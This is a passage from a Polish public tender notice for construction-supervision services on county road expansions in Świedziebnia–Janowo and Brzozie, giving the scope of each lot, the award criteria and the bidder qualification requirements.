każdej części zamówienia uzyska 60 pkt a oferty droższe odpowiednio mniej pkt. W kryterium &#34;Doświadczenie Inspektora Nadzoru&#34; ilość pkt uzyskanych przez ofertę częściową zależy od wykazanych usług nadzoru inwestorskiego, które spełniają wymagania SWZ. Maksymalnie oferta częściowa w tym kryterium w każdej części może uzyskać 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Inspektora Nadzoru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Część 2 (Zadanie 2): Pełnienie nadzoru inwestorskiego w branży sanitarnej nad realizacją robót budowlanych w inwestycji pn. „Rozbudowa dróg powiatowych na odcinku Świedziebnia – Janowo o długości około 2,300 km i na odcinku w miejscowości Brzozie o długości 0,850 km”. Lokalizacja nadzorowanych robót na odcinku drogi:<br/>1.1. Droga powiatowa nr 1808C na odcinku przez miejscowość Brzozie, od km 2+670 do km 3+481 (kilometraż lokalny zgodnie Projektem Zagospodarowania Terenu), obręb Brzozie, gm. Brzozie. <br/>2. Zamawiający informuje, że dysponuje decyzjami zezwalającymi na realizację tych inwestycji drogowych (decyzje „ZRID”), tj. nr 3.2021 z dnia 12.07.2021 na inwestycję w gminie Świedziebnia oraz nr 1.2022 z dnia 24.08.2022 na inwestycję w gminie Brzozie, wydanymi zgodnie z przepisami art. 11a ustawy z dnia 10 kwietnia 2003 r o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (tekst jedn. Dz.U.2022.176 ze zmianami). <br/>3. Zakres obowiązków inspektora nadzoru (wspólne dla wszystkich branż):<br/>1)	Udział w czynnościach przekazania Wykonawcy robót budowlanych terenu budowy.<br/>2)	Sprawowanie funkcji nadzoru inwestorskiego w ramach branży drogowej/sanitarnej, energetycznej/telekomunikacyjnej zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (t.j. Dz. U. z 2023 r. poz. 682 z późn. zm.). W ramach tych czynności Wykonawca zobowiązuje się w szczególności do:<br/>a) reprezentowania Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji zadania z projektem wykonawczym danej branży, obowiązującymi przepisami, obowiązującymi normami oraz zasadami wiedzy technicznej,<br/>b) sprawdzania jakości wykonanych robót budowlanych, wbudowanych materiałów, z w szczególności do zapobiegania zastosowaniu materiałów nie dopuszczonych do obrotu i stosowania w budownictwie,<br/>c) sprawdzania i odbioru robót budowlanych ulegających zakryciu i zanikających,<br/>d/ przygotowania i stwierdzenia gotowości do odbioru końcowego zadania oraz udział w czynnościach odbioru końcowego,<br/>e) potwierdzenia ilości wykonanych robót,<br/>f) potwierdzenia usunięcia wad stwierdzonych przy odbiorze końcowym zadania,<br/>g/ sprawdzenia rozliczeń wykonawców robót budowlanych i potwierdzenia należnych im kwot,<br/>h) rozliczenia końcowego zadania.<br/>3)	Kontrola zgodności realizacji zadania przez cały okres realizacji zamówienia. Sprawdzanie robót minimum 2 razy w tygodniu (z maksymalnie dwudniowym odstępem czasowym) potwierdzone wpisem do dziennika budowy oraz zdjęciem z budowy w wersji elektronicznej.<br/>4)	Udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.<br/>4. Zakres nadzorowanych robót w branży sanitarnej (KD):<br/>Zakres nadzorowanych robót br. sanitarnej w ramach rozbudowy drogi powiatowej nr 1808C na odcinku w miejscowości Brzozie o długości 0,850 km obejmuje m. in.:<br/>a)	wykonanie trzech odcinków kanalizacji deszczowej.<br/>5. Zamawiający nie wymaga zatrudnienia, na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących czynności w zakresie realizacji przedmiotu zamówienia, ponieważ wykonywanie tych czynności nie polega na wykonywaniu pracy w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (tekst jedn. Dz. U. z 2020 r. 1320 późn. zm.).<br/>6. Szczegółowy zakres robót budowlanych będących przedmiotem nadzoru przez inspektorów nadzoru zawiera dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót i przedmiary poszczególnych robót, stanowiące załączniki do przedmiotowego postępowania. Ww. dokumenty dostępne są w miejscu opublikowania SWZ na stronie internetowej postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych powyższej inwestycji pod adresem: https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-bd6d21ba-c3a5-11ee-a84d-d63fc4d19e65 <br/>7.Koszt robót budowlanych (po przetargu):9.247.157,53 zł brutto<br/>W tym:<br/>1)	Rozbudowa drogi powiatowej Nr 1827C na odc. Świedziebnia – Janowo - 5.377.601,18 zł brutto<br/>W tym branże:	<br/>Drogowa:- 5.377.601,18 zł brutto<br/>2)	Rozbudowa drogi powiatowej Nr 1808C odc. przez miejscowość Brzozie - 3.869.556,35 zł brutto<br/>W tym branże:<br/>Drogowa:- 3.082.556,35 zł brutto<br/>Sanitarna:-510.000,00 zł brutto<br/>Telekomunikacyjna:-277.000,00 zł brutto. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">17 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający będzie dokonywał wyboru najkorzystniejszej oferty w każdej części zamówienia (zadaniu) oddzielnie. <br/>2. Przy dokonywaniu wyboru najkorzystniejszej oferty w każdej części Zamawiający będzie oceniał oferty w kryterium Cena 60% (60 pkt możliwych do uzyskania) i Doświadczenie Inspektora Nadzoru 40 % (40 pkt możliwych do uzyskania). W kryterium &#34;Cena&#34; oferta częściowa z najniższą ceną w każdej części zamówienia uzyska 60 pkt a oferty droższe odpowiednio mniej pkt. W kryterium &#34;Doświadczenie Inspektora Nadzoru&#34; ilość pkt uzyskanych przez ofertę częściową zależy od wykazanych usług nadzoru inwestorskiego, które spełniają wymagania SWZ. Maksymalnie oferta częściowa w tym kryterium w każdej części może uzyskać 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Inspektora Nadzoru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Część 3 (Zadanie 3): Pełnienie nadzoru inwestorskiego w branży telekomunikacyjnej nad realizacją robót budowlanych w inwestycji pn. „Rozbudowa dróg powiatowych na odcinku Świedziebnia – Janowo o długości około 2,300 km i na odcinku w miejscowości Brzozie o długości 0,850 km”. Lokalizacja nadzorowanych robót na odcinku drogi:<br/>1.1. Droga powiatowa nr 1808C na odcinku przez miejscowość Brzozie, od km 2+670 do km 3+481 (kilometraż lokalny zgodnie Projektem Zagospodarowania Terenu), obręb Brzozie, gm. Brzozie. <br/>2. Zamawiający informuje, że dysponuje decyzjami zezwalającymi na realizację tych inwestycji drogowych (decyzje „ZRID”), tj. nr 3.2021 z dnia 12.07.2021 na inwestycję w gminie Świedziebnia oraz nr 1.2022 z dnia 24.08.2022 na inwestycję w gminie Brzozie, wydanymi zgodnie z przepisami art. 11a ustawy z dnia 10 kwietnia 2003 r o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (tekst jedn. Dz.U.2022.176 ze zmianami). <br/>3. Zakres obowiązków inspektora nadzoru (wspólne dla wszystkich branż):<br/>1)	Udział w czynnościach przekazania Wykonawcy robót budowlanych terenu budowy.<br/>2)	Sprawowanie funkcji nadzoru inwestorskiego w ramach branży drogowej/sanitarnej, energetycznej/telekomunikacyjnej zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (t.j. Dz. U. z 2023 r. poz. 682 z późn. zm.). W ramach tych czynności Wykonawca zobowiązuje się w szczególności do:<br/>a) reprezentowania Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji zadania z projektem wykonawczym danej branży, obowiązującymi przepisami, obowiązującymi normami oraz zasadami wiedzy technicznej,<br/>b) sprawdzania jakości wykonanych robót budowlanych, wbudowanych materiałów, z w szczególności do zapobiegania zastosowaniu materiałów nie dopuszczonych do obrotu i stosowania w budownictwie,<br/>c) sprawdzania i odbioru robót budowlanych ulegających zakryciu i zanikających,<br/>d/ przygotowania i stwierdzenia gotowości do odbioru końcowego zadania oraz udział w czynnościach odbioru końcowego,<br/>e) potwierdzenia ilości wykonanych robót,<br/>f) potwierdzenia usunięcia wad stwierdzonych przy odbiorze końcowym zadania,<br/>g/ sprawdzenia rozliczeń wykonawców robót budowlanych i potwierdzenia należnych im kwot,<br/>h) rozliczenia końcowego zadania.<br/>3)	Kontrola zgodności realizacji zadania przez cały okres realizacji zamówienia. Sprawdzanie robót minimum 2 razy w tygodniu (z maksymalnie dwudniowym odstępem czasowym) potwierdzone wpisem do dziennika budowy oraz zdjęciem z budowy w wersji elektronicznej.<br/>4)	Udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.<br/>4. Zakres nadzorowanych robót w branży telekomunikacyjnej:<br/>Zakres nadzorowanych robót br. telekomunikacyjnej w ramach rozbudowy drogi powiatowej nr 1808C na odcinku w miejscowości Brzozie o długości 0,850 km obejmuje m. in.:<br/>a)	wykonanie kanału technologicznego,<br/>b)	przebudowa kolizji sieci telekomunikacyjnej.<br/>5. Zamawiający nie wymaga zatrudnienia, na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących czynności w zakresie realizacji przedmiotu zamówienia, ponieważ wykonywanie tych czynności nie polega na wykonywaniu pracy w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (tekst jedn. Dz. U. z 2020 r. 1320 późn. zm.).<br/>6. Szczegółowy zakres robót budowlanych będących przedmiotem nadzoru przez inspektorów nadzoru zawiera dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót i przedmiary poszczególnych robót, stanowiące załączniki do przedmiotowego postępowania. Ww. dokumenty dostępne są w miejscu opublikowania SWZ na stronie internetowej postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych powyższej inwestycji pod adresem: https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-bd6d21ba-c3a5-11ee-a84d-d63fc4d19e65 <br/>7.Koszt robót budowlanych (po przetargu):9.247.157,53 zł brutto<br/>W tym:<br/>1)	Rozbudowa drogi powiatowej Nr 1827C na odc. Świedziebnia – Janowo - 5.377.601,18 zł brutto<br/>W tym branże:	<br/>Drogowa:- 5.377.601,18 zł brutto<br/>2)	Rozbudowa drogi powiatowej Nr 1808C odc. przez miejscowość Brzozie - 3.869.556,35 zł brutto<br/>W tym branże:<br/>Drogowa:- 3.082.556,35 zł brutto<br/>Sanitarna:-510.000,00 zł brutto<br/>Telekomunikacyjna:-277.000,00 zł brutto. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">17 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający będzie dokonywał wyboru najkorzystniejszej oferty w każdej części zamówienia (zadaniu) oddzielnie. <br/>2. Przy dokonywaniu wyboru najkorzystniejszej oferty w każdej części Zamawiający będzie oceniał oferty w kryterium Cena 60% (60 pkt możliwych do uzyskania) i Doświadczenie Inspektora Nadzoru 40 % (40 pkt możliwych do uzyskania). W kryterium &#34;Cena&#34; oferta częściowa z najniższą ceną w każdej części zamówienia uzyska 60 pkt a oferty droższe odpowiednio mniej pkt. W kryterium &#34;Doświadczenie Inspektora Nadzoru&#34; ilość pkt uzyskanych przez ofertę częściową zależy od wykazanych usług nadzoru inwestorskiego, które spełniają wymagania SWZ. Maksymalnie oferta częściowa w tym kryterium w każdej części może uzyskać 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Inspektora Nadzoru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1. nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 i art. 109 ust. 1 pkt 1 i 4 ustawy pzp z zastrzeżeniem art. 110 ust. 2 ustawy pzp oraz <br/>1.2. nie podlegają wykluczeniu z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego oraz <br/>1.3. spełniają warunki udziału w postępowaniu, o których mowa w art. 112 ust. 1 ustawy pzp <br/>i którzy wykażą ich spełnianie na poziomie wymaganym przez Zamawiającego zgodnie z opisem zamieszczonym poniżej. <br/>2.	Wykonawcy są zobowiązani spełnić warunki udziału w postępowaniu dotyczące (wymagane w postępowaniu): <br/>2.1. Zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia wymagań w zakresie tego warunku. <br/>2.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia wymagań w zakresie tego warunku. <br/>2.3. Sytuacji ekonomicznej i finansowej:<br/>Zamawiający nie stawia wymagań w zakresie tego warunku. <br/>2.4. Zdolności technicznej lub zawodowej: <br/>2.4.1 Doświadczenia Wykonawcy:<br/>2.4.1.1 dla zadania nr 1: <br/>Zamawiający wymaga od Wykonawców doświadczenia w wykonaniu (zakończeniu) w okresie ostatnich 8 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, usługi lub usług pełnienia nadzoru inwestorskiego <br/>w branży drogowej nad co najmniej jednym zadaniem inwestycyjnym, obejmującym wykonywanie robót bitumicznych, o wartości łącznej robót branży drogowej co najmniej 9 000 000,00 zł brutto.<br/>2.4.1.2 dla zadania nr 2: <br/>Zamawiający wymaga od Wykonawców doświadczenia w wykonaniu (zakończeniu) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, usługi lub usług pełnienia nadzoru inwestorskiego <br/>w branży sanitarnej nad co najmniej jednym zadaniem inwestycyjnym obejmującym wykonywanie robót wod. - kan., o wartości łącznej robót branży wod. - kan. co najmniej 500 000,00 zł brutto.<br/>2.4.1.3 dla zadania nr 3: <br/>Zamawiający wymaga od Wykonawców doświadczenia w wykonaniu (zakończeniu) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, usługi lub usług pełnienia nadzoru inwestorskiego w branży telekomunikacyjnej nad co najmniej jednym zadaniem inwestycyjnym obejmującym wykonywanie robót telekomunikacyjnych, o wartości łącznej robót branży telekomunikacyjnej co najmniej 300 000,00 zł brutto.<br/>2.4.2 Uprawnienia i doświadczenie osób oddelegowanych przez Wykonawcę do realizacji zamówienia: <br/>Zamawiający wymaga, aby wykonawca dysponował i wykazał osoby, które będą uczestniczyć <br/>w wykonywaniu zamówienia, legitymujące się uprawnieniami i doświadczeniem odpowiednimi do funkcji jakie zostaną im powierzone. Wykonawca, na każdą funkcję wymienioną poniżej, wskaże osoby, które musi mieć dostępne na etapie realizacji zamówienia, spełniające następujące wymagania:<br/>2.4.2.1. dla zadania 1: <br/>•	1 osobą do pełnienia funkcji Inspektora Nadzoru Branży Drogowej: <br/>- posiadającą uprawnienia budowlane do kierowania robotami w specjalności drogowej bez ograniczeń w rozumieniu ustawy z dnia 07.07.1994 r. Prawo budowlane (t.j. Dz. U. z 2023 r. poz. 682 z późn. zm.) lub odpowiadające im uprawnienia budowlane, umożliwiające pełnienie funkcji inspektora nadzoru na niniejszym zadaniu inwestycyjnym, wydane na podstawie wcześniej obowiązujących przepisów; <br/>- posiadającą doświadczenie zawodowe zdobyte w okresie ostatnich 8 lat przed upływem terminu składania ofert, pełniąc funkcje (zgodnie z Prawem Budowlanym) inspektora nadzoru branży drogowej lub kierownika budowy/kierownika robót branży drogowej na zadaniach inwestycyjnych o łącznej wartości robót br. drogowej co najmniej 9.000.000,00 zł brutto.<br/>2.4.2.2. dla zadania 2: <br/>•	1 osobą do pełnienia funkcji Inspektora Nadzoru Branży Sanitarnej;<br/>- posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń w rozumieniu ustawy z dnia 07.07.1994 r. Prawo budowlane (t.j. Dz. U. z 2023 r. poz. 682 z późn. zm.) lub odpowiadające im uprawnienia budowlane, umożliwiające pełnienie funkcji inspektora nadzoru na niniejszym zadaniu inwestycyjnym, wydane na podstawie wcześniej obowiązujących przepisów;<br/>- posiadającą doświadczenie zawodowe zdobyte w okresie ostatnich 5 lat przed upływem terminu składania ofert, pełniąc funkcje (zgodnie z Prawem Budowlanym) inspektora nadzoru branży sanitarnej lub kierownika budowy/kierownika robót branży sanitarnej na zadaniach inwestycyjnych o łącznej wartości robót wod-kan. co najmniej 500.000,00 zł brutto.<br/>2.4.2.3. dla zadania 3: <br/>•	1 osobą do pełnienia funkcji Inspektora Nadzoru Branży Telekomunikacyjnej;<br/>- posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń w rozumieniu ustawy z dnia 07.07.1994 r. Prawo budowlane (t.j. Dz. U. z 2023 r. poz. 682 z późn. zm.) lub odpowiadające im uprawnienia budowlane, umożliwiające pełnienie funkcji inspektora nadzoru na niniejszym zadaniu inwestycyjnym, wydane na podstawie wcześniej obowiązujących przepisów;<br/>- posiadającą doświadczenie zawodowe zdobyte w okresie ostatnich 5 lat przed upływem terminu składania ofert, pełniąc funkcje (zgodnie z Prawem Budowlanym) inspektora nadzoru branży telekomunikacyjnej lub kierownika budowy/kierownika robót branży telekomunikacyjnej na zadaniach inwestycyjnych o łącznej wartości robót br. telekomunikacyjnej co najmniej 300.000,00 zł brutto.<br/>2.5. Ilekroć w opisie warunków udziału w postępowaniu jest mowa o uprawnieniach to w przypadku osób będących obywatelami krajów członkowskich Unii Europejskiej oznacza to decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej samodzielnych funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia – zgodnie z właściwymi przepisami w szczególności z ustawą z dnia 22 grudnia 2015r o zasadach uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii Europejskiej (Dz. U. z 2019 r. poz. 220) oraz ustawą z dnia 15 grudnia 2000 o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r,. poz. 1117).<br/>2.6. Dla spełnienia warunku dysponowania osobami posiadającymi doświadczenie zawodowe zdobyte w okresie ostatnich 5 lat (a 8 lat dla robót drogowych) przed upływem terminu składania ofert, Zamawiający będzie brał pod uwagę tylko:<br/>- usługi/roboty budowlane, w których proponowana osoba pełniła funkcję, zostały uznane za należycie wykonane lub prawidłowo ukończone, <br/>- zakończone w/w okresie;<br/>2.7. Ilekroć w pkt 2.4.1.1. – 2.4.1.3 oraz 2.4.2.1 – 2.4.2.3 mowa jest o „zadaniach inwestycyjnych” to Zamawiający pod tym pojęciem rozumie przedsięwzięcia inwestycyjne polegające na budowie lub rozbudowie lub przebudowie obiektu liniowego.<br/>2.8. Za obiekt liniowy Zamawiający uznaje obiekt liniowy w rozumieniu ustawy z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2021 r., poz. 1376 ze zm.).<br/>2.9. Jako wykonanie (zakończenie) usługi należy rozumieć doprowadzenie co najmniej do podpisania końcowego protokołu odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się protokołu odbioru robót). Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień podpisania protokołu odbioru końcowego robót. <br/>2.10. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający informuje, że w obecnym stanie prawnym wykazywanie się doświadczeniem w ramach konsorcjum wymaga wskazanie potwierdzenia spełnienia warunku przez konsorcjanta samodzielnie, który na spełnienie danego warunku się powołuje. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>2)	zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy pzp, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3)	odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy pzp, sporządzonych <br/>nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich uprawnień i doświadczenia (z okresu ostatnich 5 lat dla zadania nr 2, 3 i 8 lat dla zadania nr 1 niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 4 do SWZ;<br/>Okresy 5 lat i 8 lat, o których mowa powyżej liczą się wstecz od dnia, w którym upływa termin składania ofert.<br/>2) wykaz usług wykonanych w okresie ostatnich 5 lat dla zadania nr 2, 3 i 8 lat dla zadania nr 1, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy – załącznik nr 4a do SWZ;<br/>Okresy 5 lat i 8 lat, o których mowa powyżej liczą się wstecz od dnia, w którym upływa termin składania ofert.”</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie określił przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy – sporządzony i podpisany elektronicznie dokument wg wzoru stanowiącego zał. nr 1 do SWZ. <br/>2) Oświadczenia o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, składane na podstawie art. 125 ust. 1 ustawy Pzp. Wzór oświadczenia zawarto w załączniku nr 2 do SWZ; W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa wyżej składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby Wykonawca dołącza również oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby;<br/>Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z KRS lub CEIDG lub innego właściwego rejestru, Zamawiający może żądać od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy lub odpowiednio: do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 